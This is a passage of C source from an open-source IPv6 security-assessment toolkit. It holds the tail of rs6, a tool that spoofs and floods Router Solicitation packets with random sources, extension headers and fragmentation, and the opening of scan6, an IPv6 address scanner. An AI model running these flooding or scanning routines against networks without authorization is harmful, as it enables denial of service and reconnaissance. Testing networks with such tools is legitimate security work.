puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ idata.hsrcaddr_f = 1; if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'D': /* Destination Ethernet Address */ idata.hdstaddr_f = 1; if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'E': /* Source link-layer option */ sllopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } sllopta_f=1; nlinkaddr++; break; case 'e': /* Add Source link-layer option */ sllopt_f = 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f=1; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("rs6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if( pcap_datalink(idata.pfd) != DLT_EN10MB){ printf("Error: Interface %s is not an Ethernet interface\n", idata.iface); exit(EXIT_FAILURE); } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_NOPACKETS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); srandom(time(NULL)); /* If the IPv6 Source Address has not been specified, and the "-F" (flood) option has not been specified, select a random link-local unicast address. */ if(!idata.srcaddr_f && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second highe-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<4;i++) idata.srcaddr.s6_addr16[i]=0x0000; for(i=4; i<8; i++) idata.srcaddr.s6_addr16[i]=random(); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) idata.srcaddr.s6_addr16[i]=0x0000; idata.srcpreflen=64; } if(!idata.dstaddr_f){ /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_ROUTERS_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } } if(!idata.hsrcaddr_f) /* Source link-layer address is randomized by default */ for(i=0; i<6; i++) idata.hsrcaddr.a[i]= random(); if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLROUTERS_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(sllopt_f && !sllopta_f){ /* The value of the source link-layer address option */ linkaddr[0]= idata.hsrcaddr; /* defaults to the source Ethernet address */ nlinkaddr++; } if(!floods_f) nsources=1; if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata.max_packet_size = ETH_DATA_LEN; if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); send_packet(&idata); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f && idata.verbose_f) printf("Now sending Router Solicitations every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (U. part) (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_router_solicit)) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting Router Solicitation header (should be using Frag. option?)"); exit(EXIT_FAILURE); } rs= (struct nd_router_solicit *) (ptr); rs->nd_rs_type = ND_ROUTER_SOLICIT; rs->nd_rs_code = 0; ptr += sizeof(struct nd_router_solicit); /* If a single source link-layer address is specified, it is included in all packets */ if(sllopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_slla)) <= (v6buffer+idata->max_packet_size)){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy(linkaddr[0].a, sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); } else{ puts("Packet too large while processing source link-layer addresss opt. (should be using Frag. option?)"); exit(EXIT_FAILURE); } } startofprefixes = ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Router Solicitation Message, and * send the attack apcket(s). */ void send_packet(struct iface_data *idata){ sources=0; do{ if(floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second highest-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ /* Randomize the IPv6 Source address based on the specified prefix and prefix length (defaults to fe80::/64). */ startrand= idata->srcpreflen/16; for(i=0; iip6_src.s6_addr16[i]= 0; for(i=startrand; i<8; i++) ipv6->ip6_src.s6_addr16[i]=random(); if(idata->srcpreflen%16){ mask=0xffff; for(i=0; i<(idata->srcpreflen%16); i++) mask= mask>>1; ipv6->ip6_src.s6_addr16[startrand]= ipv6->ip6_src.s6_addr16[startrand] & htons(mask); } for(i=0; i<=(idata->srcpreflen/16); i++) ipv6->ip6_src.s6_addr16[i]= ipv6->ip6_src.s6_addr16[i] | idata->srcaddr.s6_addr16[i]; if(!idata->hsrcaddr_f){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); /* If the source-link layer address must be included, but no value was specified we set it to the randomized Ethernet Source Address */ if(sllopt_f && !sllopta_f){ bcopy(ethernet->src.a, sllaopt->address, ETH_ALEN); } } } if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; do{ newdata_f=0; ptr = startofprefixes; while(linkaddrsmax_packet_size){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy(linkaddr[linkaddrs].a, sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); linkaddrs++; newdata_f=1; } rs->nd_rs_cksum = 0; rs->nd_rs_cksum = in_chksum(v6buffer, rs, ptr-((unsigned char *)rs), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest fragment * size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw,\ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } } }while(linkaddrs>nlinkaddr && newdata_f); sources++; }while(sources\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Print attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } if(ether_ntop(&(idata->hdstaddr), phdstaddr, sizeof(phdstaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", phdstaddr, \ ((!idata->hdstaddr_f)?" (all-routers multicast)":"")); if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-routers link-local multicast)":"")); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; i Address: %s\n", \ ((floods_f && !sllopta_f)?"(randomized for each packet)":plinkaddr)); } } ipv6toolkit-1.5.1/tools/rs6.h000066400000000000000000000000541223702747200160400ustar00rootroot00000000000000/* * Header file for the rs6 tool * */ ipv6toolkit-1.5.1/tools/scan6.c000066400000000000000000003512001223702747200163350ustar00rootroot00000000000000/* * scan6: An IPv6 Address Scanning Tool * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make scan6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include "scan6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ int create_candidate_globals(struct iface_data *, struct host_list *, struct host_list *, \ struct host_list *); int find_local_globals(pcap_t *, struct iface_data *, unsigned char, const char *, struct host_list *); void free_host_entries(struct host_list *); int host_scan_local(pcap_t *, struct iface_data *, struct in6_addr *, unsigned char, \ struct host_entry *); int multi_scan_local(pcap_t *, struct iface_data *, struct in6_addr *, unsigned char, \ const char *, struct host_list *); void print_help(void); int print_host_entries(struct host_list *, unsigned char); int print_unique_host_entries(struct host_list *, unsigned char); void local_sig_alarm(int); void usage(void); int validate_host_entries(pcap_t *, struct iface_data *, struct host_list *, struct host_list *); int probe_node_nd(const char *, struct ether_addr *, struct in6_addr *, struct in6_addr *,\ struct ether_addr *); int process_icmp6_response(struct iface_data *, struct host_list *, unsigned char , \ struct pcap_pkthdr *, const u_char *, unsigned char *); int valid_icmp6_response(struct iface_data *, unsigned char, struct pcap_pkthdr *,\ const u_char *, unsigned char *); int valid_icmp6_response_remote(struct iface_data *, struct scan_list *, unsigned char, \ struct pcap_pkthdr *, const u_char *, unsigned char *); int print_scan_entries(struct scan_list *); int load_ipv4mapped32_entries(struct scan_list *, struct scan_entry *, struct prefix4_entry *); int load_ipv4mapped64_entries(struct scan_list *, struct scan_entry *, struct prefix4_entry *); int load_embeddedport_entries(struct scan_list *, struct scan_entry *); int load_lowbyte_entries(struct scan_list *, struct scan_entry *); int load_oui_entries(struct scan_list *, struct scan_entry *, struct ether_addr *); int load_vm_entries(struct scan_list *, struct scan_entry *, struct prefix4_entry *); int load_vendor_entries(struct scan_list *, struct scan_entry *, char *); int load_knownprefix_entries(struct scan_list *, struct scan_list *, FILE *); int load_knowniid_entries(struct scan_list *, struct scan_list *, struct prefix_list *); int load_knowniidfile_entries(struct scan_list *, struct scan_list *, FILE *); int match_strings(char *, char *); int load_bruteforce_entries(struct scan_list *, struct scan_entry *); void prefix_to_scan(struct prefix_entry *, struct scan_entry *); int get_next_target(struct scan_list *); int is_target_in_range(struct scan_entry *); int send_probe_remote(struct iface_data *, struct scan_list *, struct in6_addr *, unsigned char); void reset_scan_list(struct scan_list *); int process_config_file(const char *); int is_ip6_in_scan_list(struct scan_list *, struct in6_addr *); /* Used for multiscan */ struct host_list host_local, host_global, host_candidate; struct host_entry *host_locals[MAX_IPV6_ENTRIES], *host_globals[MAX_IPV6_ENTRIES]; struct host_entry *host_candidates[MAX_IPV6_ENTRIES]; /* Used for router discovery */ struct iface_data idata; /* Variables used for learning the default router */ struct ether_addr router_ether, rs_ether; struct in6_addr router_ipv6, rs_ipv6; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct tcp_hdr *pkt_tcp; int result; unsigned char error_f; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[BUFFER_SIZE], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; char line[LINE_BUFFER_SIZE]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; unsigned int ndst=0; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned char dstpreflen; u_int16_t mask; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN], pv4addr[INET_ADDRSTRLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char verbose_f=FALSE; unsigned char rand_src_f=FALSE, rand_link_src_f=FALSE; unsigned char accepted_f=FALSE, configfile_f=FALSE, dstaddr_f=FALSE, hdstaddr_f=FALSE, dstprefix_f=FALSE; unsigned char print_f=FALSE, print_local_f=FALSE, print_global_f=FALSE, probe_echo_f=FALSE, probe_unrec_f=FALSE, probe_f=FALSE; unsigned char print_type=NOT_PRINT_ETHER_ADDR, scan_local_f=FALSE, print_unique_f=FALSE, localaddr_f=FALSE; unsigned char tunnel_f=FALSE, loopback_f=FALSE, timestamps_f=FALSE; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=FALSE, dstoptuhdr_f=FALSE, dstopthdr_f=FALSE; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=FALSE; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize, max_packet_size; unsigned char *prev_nh, *startoffragment; /* Remote scans */ unsigned int inc=1; int ranges; struct scan_list scan_list, prefix_list; struct scan_entry *target_list[MAX_SCAN_ENTRIES]; struct scan_entry *tgt_pref_list[MAX_PREF_ENTRIES]; struct prefix_list iid_list; struct prefix_entry *tgt_iid_list[MAX_IID_ENTRIES]; unsigned char dst_f=FALSE, tgt_ipv4mapped32_f=FALSE, tgt_ipv4mapped64_f=FALSE, tgt_lowbyte_f=FALSE, tgt_oui_f=FALSE; unsigned char tgt_vendor_f=FALSE, tgt_vm_f=FALSE, tgt_bruteforce_f=FALSE, tgt_range_f=FALSE, tgt_portembedded_f=FALSE; unsigned char tgt_knowniids_f=FALSE, tgt_knowniidsfile_f=FALSE, knownprefixes_f=FALSE; unsigned char vm_vbox_f=FALSE, vm_vmware_f=FALSE, vm_vmwarem_f=FALSE, v4hostaddr_f=FALSE; unsigned char v4hostprefix_f=FALSE, sort_ouis_f=FALSE, rnd_probes_f=FALSE, inc_f=FALSE, end_f=FALSE, donesending_f=FALSE; unsigned char onlink_f=FALSE, pps_f=FALSE, bps_f=FALSE, tcpflags_f=FALSE, rhbytes_f=FALSE, srcport_f=FALSE, dstport_f=FALSE, probetype; unsigned char loop_f=FALSE, sleep_f=FALSE; u_int16_t srcport, dstport; u_int8_t tcpflags=0; unsigned long pktinterval, rate; unsigned int packetsize, rhbytes; struct prefix4_entry v4host; struct prefix_entry prefix; struct ether_addr oui; char *charstart, *charend, *lastcolon; char rangestart[MAX_RANGE_STR_LEN+1], rangeend[MAX_RANGE_STR_LEN+1]; char fname[MAX_FILENAME_SIZE], fname_f=FALSE, configfile[MAX_FILENAME_SIZE], knowniidsfile[MAX_FILENAME_SIZE]; char knownprefixesfile[MAX_FILENAME_SIZE]; FILE *knowniids_fp, *knownprefixes_fp; char *oui_end=":00:00:00"; char oui_ascii[ETHER_ADDR_PLEN]; char vendor[MAX_IEEE_OUIS_LINE_SIZE]; unsigned int nsleep; int sel; fd_set sset, rset, wset, eset; struct timeval curtime, pcurtime, lastprobe; struct tm pcurtimetm; u_int16_t service_ports_hex[]={0x21, 0x22, 0x23, 0x25, 0x49, 0x53, 0x80, 0x110, 0x123, 0x179, 0x220, 0x389, \ 0x443, 0x547, 0x993, 0x995, 0x1194, 0x3306, 0x5060, 0x5061, 0x5432, 0x6446, 0x8080}; u_int16_t service_ports_dec[]={21, 22, 23, 25, 49, 53, 80, 110, 123, 179, 220, 389, \ 443, 547, 993, 995, 1194, 3306, 5060, 5061, 5432, 6446, 8080}; /* IPv6 Address Resolution */ sigjmp_buf env; unsigned int canjump; int main(int argc, char **argv){ extern char *optarg; int r; struct timeval timeout; char date[DATE_STR_LEN]; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"local-scan", no_argument, 0, 'L'}, {"probe-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'Z'}, {"src-port", required_argument, 0, 'o'}, {"dst-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"print-type", required_argument, 0, 'P'}, {"print-unique", no_argument, 0, 'q'}, {"print-link-addr", no_argument, 0, 'e'}, {"print-timestamp", no_argument, 0, 't'}, {"retrans", required_argument, 0, 'x'}, {"timeout", required_argument, 0, 'O'}, {"rand-src-addr", no_argument, 0, 'f'}, {"rand-link-src-addr", no_argument, 0, 'F'}, {"tgt-virtual-machines", required_argument, 0, 'V'}, {"tgt-low-byte", no_argument, 0, 'b'}, {"tgt-ipv4", required_argument, 0, 'B'}, {"tgt-ipv4-embedded", required_argument, 0, 'B'}, {"tgt-port", no_argument, 0, 'g'}, {"tgt-port-embedded", no_argument, 0, 'g'}, {"tgt-ieee-oui", required_argument, 0, 'k'}, {"tgt-vendor", required_argument, 0, 'K'}, {"tgt-iids-file", required_argument, 0, 'w'}, {"tgt-iid", required_argument, 0, 'W'}, {"prefixes-file", required_argument, 0, 'm'}, {"ipv4-host", required_argument, 0, 'Q'}, {"sort-ouis", no_argument, 0, 'T'}, {"random-probes", no_argument, 0, 'N'}, {"inc-size", required_argument, 0, 'I'}, {"rate-limit", required_argument, 0, 'r'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"config-file", required_argument, 0, 'c'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= 